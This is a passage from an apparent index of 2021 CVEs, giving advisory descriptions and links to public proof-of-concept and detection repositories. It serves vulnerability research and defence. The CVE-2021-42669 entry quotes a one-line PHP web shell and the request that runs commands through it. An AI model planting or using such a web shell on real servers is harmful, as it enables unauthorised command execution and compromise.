- [knightswd/NoPacScan](https://github.com/knightswd/NoPacScan)
- [XiaoliChan/Invoke-sAMSpoofing](https://github.com/XiaoliChan/Invoke-sAMSpoofing)
- [TryA9ain/noPac](https://github.com/TryA9ain/noPac)
### CVE-2021-42292 (2021-11-10)
Microsoft Excel Security Feature Bypass Vulnerability
- [corelight/CVE-2021-42292](https://github.com/corelight/CVE-2021-42292)
### CVE-2021-42321 (2021-11-10)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [DarkSprings/CVE-2021-42321](https://github.com/DarkSprings/CVE-2021-42321)
- [xnyuq/cve-2021-42321](https://github.com/xnyuq/cve-2021-42321)
- [7BitsTeam/exch_CVE-2021-42321](https://github.com/7BitsTeam/exch_CVE-2021-42321)
### CVE-2021-42325 (2021-10-12)
Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name.
- [AK-blank/CVE-2021-42325-](https://github.com/AK-blank/CVE-2021-42325-)
### CVE-2021-42327 (2021-10-21)
dp_link_settings_write in drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c in the Linux kernel through 5.14.14 allows a heap-based buffer overflow by an attacker who can write a string to the AMD GPU display drivers debug filesystem. There are no checks on size within parse_write_buffer_into_params when it uses the size of copy_from_user to copy a userspace buffer into a 40-byte heap buffer.
- [docfate111/CVE-2021-42327](https://github.com/docfate111/CVE-2021-42327)
### CVE-2021-42342 (2021-10-14)
An issue was discovered in GoAhead 4.x and 5.x before 5.1.5. In the file upload filter, user form variables can be passed to CGI scripts without being prefixed with the CGI prefix. This permits tunneling untrusted environment variables into vulnerable CGI scripts.
- [kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-](https://github.com/kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-)
- [ijh4723/-zeroboo-Gohead-CVE-2021-42342-1](https://github.com/ijh4723/-zeroboo-Gohead-CVE-2021-42342-1)
### CVE-2021-42362 (2021-11-17)
The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.
- [simonecris/CVE-2021-42362-PoC](https://github.com/simonecris/CVE-2021-42362-PoC)
### CVE-2021-42392 (2022-01-07)
The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console which leads to unauthenticated remote code execution.
- [cybersecurityworks553/CVE-2021-42392-Detect](https://github.com/cybersecurityworks553/CVE-2021-42392-Detect)
### CVE-2021-42558 (2022-01-12)
An issue was discovered in CALDERA 2.8.1. It contains multiple reflected, stored, and self XSS vulnerabilities that may be exploited by authenticated and unauthenticated attackers.
- [mbadanoiu/CVE-2021-42558](https://github.com/mbadanoiu/CVE-2021-42558)
### CVE-2021-42559 (2022-01-12)
An issue was discovered in CALDERA 2.8.1. It contains multiple startup "requirements" that execute commands when starting the server. Because these commands can be changed via the REST API, an authenticated user can insert arbitrary commands that will execute when the server is restarted.
- [mbadanoiu/CVE-2021-42559](https://github.com/mbadanoiu/CVE-2021-42559)
### CVE-2021-42560 (2022-01-12)
An issue was discovered in CALDERA 2.9.0. The Debrief plugin receives base64 encoded "SVG" parameters when generating a PDF document. These SVG documents are parsed in an unsafe manner and can be leveraged for XXE attacks (e.g., File Exfiltration, Server Side Request Forgery, Out of Band Exfiltration, etc.).
- [mbadanoiu/CVE-2021-42560](https://github.com/mbadanoiu/CVE-2021-42560)
### CVE-2021-42561 (2022-01-12)
An issue was discovered in CALDERA 2.8.1. When activated, the Human plugin passes the unsanitized name parameter to a python "os.system" function. This allows attackers to use shell metacharacters (e.g., backticks "``" or dollar parenthesis "$()" ) in order to escape the current command and execute arbitrary shell commands.
- [mbadanoiu/CVE-2021-42561](https://github.com/mbadanoiu/CVE-2021-42561)
### CVE-2021-42562 (2022-01-12)
An issue was discovered in CALDERA 2.8.1. It does not properly segregate user privileges, resulting in non-admin users having access to read and modify configuration or other components that should only be accessible by admin users.
- [mbadanoiu/CVE-2021-42562](https://github.com/mbadanoiu/CVE-2021-42562)
### CVE-2021-42574 (2021-11-01)
An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-right and right-to-left characters, the visual order of tokens may be different from their logical order. Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.
- [shiomiyan/CVE-2021-42574](https://github.com/shiomiyan/CVE-2021-42574)
- [hffaust/CVE-2021-42574_and_CVE-2021-42694](https://github.com/hffaust/CVE-2021-42574_and_CVE-2021-42694)
- [simplylu/CVE-2021-42574](https://github.com/simplylu/CVE-2021-42574)
- [maweil/bidi_char_detector](https://github.com/maweil/bidi_char_detector)
- [pierDipi/unicode-control-characters-action](https://github.com/pierDipi/unicode-control-characters-action)
- [waseeld/CVE-2021-42574](https://github.com/waseeld/CVE-2021-42574)
- [tin-z/solidity_CVE-2021-42574-POC](https://github.com/tin-z/solidity_CVE-2021-42574-POC)
### CVE-2021-42662 (2021-11-05)
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the Holiday reason parameter. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfers behalf, which can lead to cookie stealing and more.
- [0xDeku/CVE-2021-42662](https://github.com/0xDeku/CVE-2021-42662)
### CVE-2021-42663 (2021-11-05)
An HTML injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link he will display the content of the HTML code of the attacker's choice.
- [0xDeku/CVE-2021-42663](https://github.com/0xDeku/CVE-2021-42663)
### CVE-2021-42664 (2021-11-05)
A Stored Cross Site Scripting (XSS) Vulneraibiilty exists in Sourcecodester Engineers Online Portal in PHP via the (1) Quiz title and (2) quiz description parameters to add_quiz.php. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfers behalf, which can lead to cookie stealing and more.
- [0xDeku/CVE-2021-42664](https://github.com/0xDeku/CVE-2021-42664)
### CVE-2021-42665 (2021-11-05)
An SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the login form inside of index.php, which can allow an attacker to bypass authentication.
- [0xDeku/CVE-2021-42665](https://github.com/0xDeku/CVE-2021-42665)
### CVE-2021-42666 (2021-11-05)
A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to quiz_question.php, which could let a malicious user extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server.
- [0xDeku/CVE-2021-42666](https://github.com/0xDeku/CVE-2021-42666)
### CVE-2021-42667 (2021-11-05)
A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
- [0xDeku/CVE-2021-42667](https://github.com/0xDeku/CVE-2021-42667)
### CVE-2021-42668 (2021-11-05)
A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page.. As a result, an attacker can extract sensitive data from the web server and in some cases can use this vulnerability in order to get a remote code execution on the remote web server.
- [0xDeku/CVE-2021-42668](https://github.com/0xDeku/CVE-2021-42668)
### CVE-2021-42669 (2021-11-05)
A file upload vulnerability exists in Sourcecodester Engineers Online Portal in PHP via dashboard_teacher.php, which allows changing the avatar through teacher_avatar.php. Once an avatar gets uploaded it is getting uploaded to the /admin/uploads/ directory, and is accessible by all users. By uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" the attacker can execute commands on the web server with - /admin/uploads/php-webshell?cmd=id.
- [0xDeku/CVE-2021-42669](https://github.com/0xDeku/CVE-2021-42669)
### CVE-2021-42670 (2021-11-05)
A SQL injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to the announcements_student.php web page. As a result a malicious user can extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server.
- [0xDeku/CVE-2021-42670](https://github.com/0xDeku/CVE-2021-42670)
### CVE-2021-42671 (2021-11-05)
An incorrect access control vulnerability exists in Sourcecodester Engineers Online Portal in PHP in nia_munoz_monitoring_system/admin/uploads. An attacker can leverage this vulnerability in order to bypass access controls and access all the files uploaded to the web server without the need of authentication or authorization.
- [0xDeku/CVE-2021-42671](https://github.com/0xDeku/CVE-2021-42671)
### CVE-2021-42694 (2021-11-01)
An issue was discovered in the character definitions of the Unicode Specification through 14.0. The specification allows an adversary to produce source code identifiers such as function names using homoglyphs that render visually identical to a target identifier. Adversaries can leverage this to inject code via adversarial identifier definitions in upstream software dependencies invoked deceptively in downstream software. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard (all versions). Unless mitigated, an adversary could produce source code identifiers using homoglyph characters that render visually identical to but are distinct from a target identifier. In this way, an adversary could inject adversarial identifier definitions in upstream software that are not detected by human reviewers and are invoked deceptively in downstream software. The Unicode Consortium has documented this class of security vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms.
- [simplylu/CVE-2021-42694](https://github.com/simplylu/CVE-2021-42694)
### CVE-2021-42697 (2021-11-02)
Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7 can encounter stack exhaustion while parsing HTTP headers, which allows a remote attacker to conduct a Denial of Service attack by sending a User-Agent header with deeply nested comments.
- [cxosmo/CVE-2021-42697](https://github.com/cxosmo/CVE-2021-42697)
### CVE-2021-42717 (2021-12-07)
ModSecurity 3.x through 3.0.5 mishandles excessively nested JSON objects. Crafted JSON objects with nesting tens-of-thousands deep could result in the web server being unable to service legitimate requests. Even a moderately large (e.g., 300KB) HTTP request can occupy one of the limited NGINX worker processes for minutes and consume almost all of the available CPU on the machine. Modsecurity 2 is similarly vulnerable: the affected versions include 2.8.0 through 2.9.4.
- [EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717](https://github.com/EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717)
### CVE-2021-42756 (2023-02-16)
Multiple stack-based buffer overflow vulnerabilities [CWE-121] in the proxy daemon of FortiWeb 5.x all versions, 6.0.7 and below, 6.1.2 and below, 6.2.6 and below, 6.3.16 and below, 6.4 all versions may allow an unauthenticated remote attacker to achieve arbitrary code execution via specifically crafted HTTP requests.
- [3ndorph1n/CVE-2021-42756](https://github.com/3ndorph1n/CVE-2021-42756)
### CVE-2021-42835 (2021-12-08)
An issue was discovered in Plex Media Server through 1.24.4.5081-e362dc1ee. An attacker (with a foothold in a endpoint via a low-privileged user account) can access the exposed RPC service of the update service component. This RPC functionality allows the attacker to interact with the RPC functionality and execute code from a path of his choice (local, or remote via SMB) because of a TOCTOU race condition. This code execution is in the context of the Plex update service (which runs as SYSTEM).
- [netanelc305/PlEXcalaison](https://github.com/netanelc305/PlEXcalaison)
### CVE-2021-42913 (2021-12-20)
The SyncThru Web Service on Samsung SCX-6x55X printers allows an attacker to gain access to a list of SMB users and cleartext passwords by reading the HTML source code. Authentication is not required.
- [kernel-cyber/CVE-2021-42913](https://github.com/kernel-cyber/CVE-2021-42913)
### CVE-2021-42948 (2022-09-16)
HotelDruid Hotel Management Software v3.0.3 and below was discovered to have exposed session tokens in multiple links via GET parameters, allowing attackers to access user session id's.
- [dhammon/HotelDruid-CVE-2021-42948](https://github.com/dhammon/HotelDruid-CVE-2021-42948)
### CVE-2021-42949 (2022-09-16)
The component controlla_login function in HotelDruid Hotel Management Software v3.0.3 generates a predictable session token, allowing attackers to bypass authentication via bruteforce attacks.
- [dhammon/HotelDruid-CVE-2021-42949](https://github.com/dhammon/HotelDruid-CVE-2021-42949)
### CVE-2021-43008 (2022-04-05)
Improper Access Control in Adminer versions 1.12.0 to 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the remote server by requesting the Adminer to connect to a remote MySQL database.
- [p0dalirius/CVE-2021-43008-AdminerRead](https://github.com/p0dalirius/CVE-2021-43008-AdminerRead)
### CVE-2021-43032 (2021-11-03)
In XenForo through 2.2.7, a threat actor with access to the admin panel can create a new Advertisement via the Advertising function, and save an XSS payload in the body of the HTML document. This payload will execute globally on the client side.
- [SakuraSamuraii/CVE-2021-43032](https://github.com/SakuraSamuraii/CVE-2021-43032)
### CVE-2021-43129 (2022-04-19)
A bypass exists for Desire2Learn/D2L Brightspace’s “Disable Right Click” option in the quizzing feature, which allows a quiz-taker to access print and copy functionality via the browser’s right click menu even when “Disable Right Click” is enabled on the quiz.
- [Skotizo/CVE-2021-43129](https://github.com/Skotizo/CVE-2021-43129)
### CVE-2021-43141 (2021-11-03)
Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in plan_application.
- [Jeromeyoung/CVE-2021-43141](https://github.com/Jeromeyoung/CVE-2021-43141)
### CVE-2021-43217 (2021-12-15)
Windows Encrypting File System (EFS) Remote Code Execution Vulnerability
- [JolynNgSC/EFS_CVE-2021-43217](https://github.com/JolynNgSC/EFS_CVE-2021-43217)
### CVE-2021-43224 (2021-12-15)
Windows Common Log File System Driver Information Disclosure Vulnerability
- [KaLendsi/CVE-2021-43224-POC](https://github.com/KaLendsi/CVE-2021-43224-POC)
### CVE-2021-43226 (2021-12-15)
Windows Common Log File System Driver Elevation of Privilege Vulnerability
- [Rosayxy/cve-2021-43226PoC](https://github.com/Rosayxy/cve-2021-43226PoC)
### CVE-2021-43229 (2021-12-15)
Windows NTFS Elevation of Privilege Vulnerability
- [Citizen13X/CVE-2021-43229](https://github.com/Citizen13X/CVE-2021-43229)
### CVE-2021-43258 (2022-11-23)
CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access tot he ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the site in the /tmp_attach/ folder where it can be accessed with a GET request. There are no limitations on files that can be attached, allowing for malicious PHP code to be uploaded and interpreted by the server.
- [MRvirusIR/CVE-2021-43258](https://github.com/MRvirusIR/CVE-2021-43258)
### CVE-2021-43267 (2021-11-02)
An issue was discovered in net/tipc/crypto.c in the Linux kernel before 5.14.16. The Transparent Inter-Process Communication (TIPC) functionality allows remote attackers to exploit insufficient validation of user-supplied sizes for the MSG_CRYPTO message type.
- [DarkSprings/CVE-2021-43267-POC](https://github.com/DarkSprings/CVE-2021-43267-POC)
- [zzhacked/CVE-2021-43267](https://github.com/zzhacked/CVE-2021-43267)
### CVE-2021-43287 (2022-04-14)
An issue was discovered in ThoughtWorks GoCD before 21.3.0. The business continuity add-on, which is enabled by default, leaks all secrets known to the GoCD server to unauthenticated attackers.
- [Wrin9/CVE-2021-43287](https://github.com/Wrin9/CVE-2021-43287)
### CVE-2021-43297 (2022-01-10)
A deserialization vulnerability existed in dubbo hessian-lite 3.2.11 and its earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protocol, during Hessian catch unexpected exceptions, Hessian will log out some imformation for users, which may cause remote command execution. This issue affects Apache Dubbo Apache Dubbo 2.6.x versions prior to 2.6.12; Apache Dubbo 2.7.x versions prior to 2.7.15; Apache Dubbo 3.0.x versions prior to 3.0.5.
- [bitterzzZZ/CVE-2021-43297-POC](https://github.com/bitterzzZZ/CVE-2021-43297-POC)
- [longofo/Apache-Dubbo-Hessian2-CVE-2021-43297](https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297)
### CVE-2021-43326 (2021-12-15)
Automox Agent before 32 on Windows incorrectly sets permissions on a temporary directory.
- [gfoss/CVE-2021-43326_Exploit](https://github.com/gfoss/CVE-2021-43326_Exploit)
### CVE-2021-43408 (2021-11-19)
The "Duplicate Post" WordPress plugin up to and including version 1.1.9 is vulnerable to SQL Injection. SQL injection vulnerabilities occur when client supplied data is included within an SQL Query insecurely. SQL Injection can typically be exploited to read, modify and delete SQL table data. In many cases it also possible to exploit features of SQL server to execute system commands and/or access the local file system. This particular vulnerability can be exploited by any authenticated user who has been granted access to use the Duplicate Post plugin. By default, this is limited to Administrators, however the plugin presents the option to permit access to the Editor, Author, Contributor and Subscriber roles.
- [tuannq2299/CVE-2021-43408](https://github.com/tuannq2299/CVE-2021-43408)
### CVE-2021-43469 (2021-12-06)
VINGA WR-N300U 77.102.1.4853 is affected by a command execution vulnerability in the goahead component.
- [badboycxcc/CVE-2021-43469](https://github.com/badboycxcc/CVE-2021-43469)
### CVE-2021-43471 (2021-12-06)
In Canon LBP223 printers, the System Manager Mode login does not require an account password or PIN. An attacker can remotely shut down the device after entering the background, creating a denial of service vulnerability.
- [cxaqhq/CVE-2021-43471](https://github.com/cxaqhq/CVE-2021-43471)
### CVE-2021-43503
- [guoyanan1g/Laravel-vul](https://github.com/guoyanan1g/Laravel-vul)
- [kang8/CVE-2021-43503](https://github.com/kang8/CVE-2021-43503)
### CVE-2021-43515 (2022-04-08)
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file.
- [ixSly/CVE-2021-43515](https://github.com/ixSly/CVE-2021-43515)
### CVE-2021-43530 (2021-12-08)
A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 94.
- [hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-](https://github.com/hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-)
### CVE-2021-43557 (2021-11-22)
The uri-block plugin in Apache APISIX before 2.10.2 uses $request_uri without verification. The $request_uri is the full original request URI without normalization. This makes it possible to construct a URI to bypass the block list on some occasions. For instance, when the block list contains "^/internal/", a URI like `//internal/` can be used to bypass it. Some other plugins also have the same issue. And it may affect the developer's custom plugin.
- [xvnpw/k8s-CVE-2021-43557-poc](https://github.com/xvnpw/k8s-CVE-2021-43557-poc)
### CVE-2021-43609 (2023-11-08)
An issue was discovered in Spiceworks Help Desk Server before 1.3.3. A Blind Boolean SQL injection vulnerability within the order_by_for_ticket function in app/models/reporting/database_query.rb allows an authenticated attacker to execute arbitrary SQL commands via the sort parameter. This can be leveraged to leak local files from the host system, leading to remote code execution (RCE) through deserialization of malicious data.
- [d5sec/CVE-2021-43609-POC](https://github.com/d5sec/CVE-2021-43609-POC)
### CVE-2021-43616 (2021-11-13)
The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI.
- [icatalina/CVE-2021-43616](https://github.com/icatalina/CVE-2021-43616)
### CVE-2021-43617 (2021-11-14)
Laravel Framework through 8.70.2 does not sufficiently block the upload of executable PHP content because Illuminate/Validation/Concerns/ValidatesAttributes.php lacks a check for .phar files, which are handled as application/x-httpd-php on systems based on Debian. NOTE: this CVE Record is for Laravel Framework, and is unrelated to any reports concerning incorrectly written user applications for image upload.
- [kombat1/CVE-2021-43617](https://github.com/kombat1/CVE-2021-43617)
- [aweiiy/CVE-2021-43617](https://github.com/aweiiy/CVE-2021-43617)
- [Sybelle03/CVE-2021-43617](https://github.com/Sybelle03/CVE-2021-43617)
### CVE-2021-43650 (2022-03-22)
WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process.
- [OpenXP-Research/CVE-2021-43650](https://github.com/OpenXP-Research/CVE-2021-43650)
### CVE-2021-43657 (2022-12-22)
A Stored Cross-site scripting (XSS) vulnerability via MAster.php in Sourcecodetester Simple Client Management System (SCMS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the vulnerable input fields.
- [c0n5n3d/CVE-2021-43657](https://github.com/c0n5n3d/CVE-2021-43657)
### CVE-2021-43778 (2021-11-24)
Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file.
- [AK-blank/CVE-2021-43778](https://github.com/AK-blank/CVE-2021-43778)
### CVE-2021-43789 (2021-12-07)
PrestaShop is an Open Source e-commerce web application. Versions of PrestaShop prior to 1.7.8.2 are vulnerable to blind SQL injection using search filters with `orderBy` and `sortOrder` parameters. The problem is fixed in version 1.7.8.2.
- [numanturle/CVE-2021-43789](https://github.com/numanturle/CVE-2021-43789)
### CVE-2021-43798 (2021-12-07)
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
- [taythebot/CVE-2021-43798](https://github.com/taythebot/CVE-2021-43798)
- [zer0yu/CVE-2021-43798](https://github.com/zer0yu/CVE-2021-43798)
- [jas502n/Grafana-CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798)
- [ScorpionsMAX/CVE-2021-43798-Grafana-POC](https://github.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC)
- [Mr-xn/CVE-2021-43798](https://github.com/Mr-xn/CVE-2021-43798)
- [asaotomo/CVE-2021-43798-Grafana-Exp](https://github.com/asaotomo/CVE-2021-43798-Grafana-Exp)
- [A-D-Team/grafanaExp](https://github.com/A-D-Team/grafanaExp)
- [kenuosec/grafanaExp](https://github.com/kenuosec/grafanaExp)
- [M0ge/CVE-2021-43798-grafana_fileread](https://github.com/M0ge/CVE-2021-43798-grafana_fileread)
- [JiuBanSec/Grafana-CVE-2021-43798](https://github.com/JiuBanSec/Grafana-CVE-2021-43798)
- [lfz97/CVE-2021-43798-Grafana-File-Read](https://github.com/lfz97/CVE-2021-43798-Grafana-File-Read)
- [s1gh/CVE-2021-43798](https://github.com/s1gh/CVE-2021-43798)
- [z3n70/CVE-2021-43798](https://github.com/z3n70/CVE-2021-43798)
- [Mo0ns/Grafana_POC-CVE-2021-43798](https://github.com/Mo0ns/Grafana_POC-CVE-2021-43798)
- [fanygit/Grafana-CVE-2021-43798Exp](https://github.com/fanygit/Grafana-CVE-2021-43798Exp)
- [LongWayHomie/CVE-2021-43798](https://github.com/LongWayHomie/CVE-2021-43798)
- [pedrohavay/exploit-grafana-CVE-2021-43798](https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798)
- [gixxyboy/CVE-2021-43798](https://github.com/gixxyboy/CVE-2021-43798)
- [Ryze-T/CVE-2021-43798](https://github.com/Ryze-T/CVE-2021-43798)
- [k3rwin/CVE-2021-43798-Grafana](https://github.com/k3rwin/CVE-2021-43798-Grafana)
- [gps1949/CVE-2021-43798](https://github.com/gps1949/CVE-2021-43798)
- [halencarjunior/grafana-CVE-2021-43798](https://github.com/halencarjunior/grafana-CVE-2021-43798)
- [light-Life/CVE-2021-43798](https://github.com/light-Life/CVE-2021-43798)
- [rodpwn/CVE-2021-43798-mass_scanner](https://github.com/rodpwn/CVE-2021-43798-mass_scanner)
- [aymenbouferroum/CVE-2021-43798_exploit](https://github.com/aymenbouferroum/CVE-2021-43798_exploit)
- [Jroo1053/GrafanaDirInclusion](https://github.com/Jroo1053/GrafanaDirInclusion)
- [yasindce1998/grafana-cve-2021-43798](https://github.com/yasindce1998/grafana-cve-2021-43798)
- [hupe1980/CVE-2021-43798](https://github.com/hupe1980/CVE-2021-43798)
- [G01d3nW01f/CVE-2021-43798](https://github.com/G01d3nW01f/CVE-2021-43798)
- [mauricelambert/LabAutomationCVE-2021-43798](https://github.com/mauricelambert/LabAutomationCVE-2021-43798)
- [FAOG99/GrafanaDirectoryScanner](https://github.com/FAOG99/GrafanaDirectoryScanner)
- [victorhorowitz/grafana-exploit-CVE-2021-43798](https://github.com/victorhorowitz/grafana-exploit-CVE-2021-43798)
- [katseyres2/CVE-2021-43798](https://github.com/katseyres2/CVE-2021-43798)
- [Iris288/CVE-2021-43798](https://github.com/Iris288/CVE-2021-43798)
- [wagneralves/CVE-2021-43798](https://github.com/wagneralves/CVE-2021-43798)
- [K3ysTr0K3R/CVE-2021-43798-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT)
- [ticofookfook/CVE-2021-43798](https://github.com/ticofookfook/CVE-2021-43798)
- [topyagyuu/CVE-2021-43798](https://github.com/topyagyuu/CVE-2021-43798)
- [MalekAlthubiany/CVE-2021-43798](https://github.com/MalekAlthubiany/CVE-2021-43798)
- [Sic4rio/Grafana-Decryptor-for-CVE-2021-43798](https://github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798)
- [sazzad1337/Grafana-CVE-2021-43798](https://github.com/sazzad1337/Grafana-CVE-2021-43798)
### CVE-2021-43799 (2022-01-25)
Zulip is an open-source team collaboration tool. Zulip Server installs RabbitMQ for internal message passing. In versions of Zulip Server prior to 4.9, the initial installation (until first reboot, or restart of RabbitMQ) does not successfully limit the default ports which RabbitMQ opens; this includes port 25672, the RabbitMQ distribution port, which is used as a management port. RabbitMQ's default "cookie" which protects this port is generated using a weak PRNG, which limits the entropy of the password to at most 36 bits; in practicality, the seed for the randomizer is biased, resulting in approximately 20 bits of entropy. If other firewalls (at the OS or network level) do not protect port 25672, a remote attacker can brute-force the 20 bits of entropy in the "cookie" and leverage it for arbitrary execution of code as the rabbitmq user. They can also read all data which is sent through RabbitMQ, which includes all message traffic sent by users. Version 4.9 contains a patch for this vulnerability. As a workaround, ensure that firewalls prevent access to ports 5672 and 25672 from outside the Zulip server.
- [scopion/CVE-2021-43799](https://github.com/scopion/CVE-2021-43799)
### CVE-2021-43811 (2021-12-08)
Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24.
- [s-index/CVE-2021-43811](https://github.com/s-index/CVE-2021-43811)
### CVE-2021-43821 (2021-12-14)
Opencast is an Open Source Lecture Capture & Video Management for Education. Opencast before version 9.10 or 10.6 allows references to local file URLs in ingested media packages, allowing attackers to include local files from Opencast's host machines and making them available via the web interface. Before Opencast 9.10 and 10.6, Opencast would open and include local files during ingests. Attackers could exploit this to include most local files the process has read access to, extracting secrets from the host machine. An attacker would need to have the privileges required to add new media to exploit this. But these are often widely given. The issue has been fixed in Opencast 10.6 and 11.0. You can mitigate this issue by narrowing down the read access Opencast has to files on the file system using UNIX permissions or mandatory access control systems like SELinux. This cannot prevent access to files Opencast needs to read though and we highly recommend updating.
- [Jackey0/opencast-CVE-2021-43821-env](https://github.com/Jackey0/opencast-CVE-2021-43821-env)
### CVE-2021-43848 (2022-02-01)
h2o is an open source http server. In code prior to the `8c0eca3` commit h2o may attempt to access uninitialized memory. When receiving QUIC frames in certain order, HTTP/3 server-side implementation of h2o can be misguided to treat uninitialized memory as HTTP/3 frames that have been received. When h2o is used as a reverse proxy, an attacker can abuse this vulnerability to send internal state of h2o to backend servers controlled by the attacker or third party. Also, if there is an HTTP endpoint that reflects the traffic sent from the client, an attacker can use that reflector to obtain internal state of h2o. This internal state includes traffic of other connections in unencrypted form and TLS session tickets. This vulnerability exists in h2o server with HTTP/3 support, between commit 93af138 and d1f0f65. None of the released versions of h2o are affected by this vulnerability. There are no known workarounds. Users of unreleased versions of h2o using HTTP/3 are advised to upgrade immediately.
- [neex/hui2ochko](https://github.com/neex/hui2ochko)
### CVE-2021-43857 (2021-12-27)
Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8.
- [lowkey0808/CVE-2021-43857](https://github.com/lowkey0808/CVE-2021-43857)
### CVE-2021-43858 (2021-12-27)
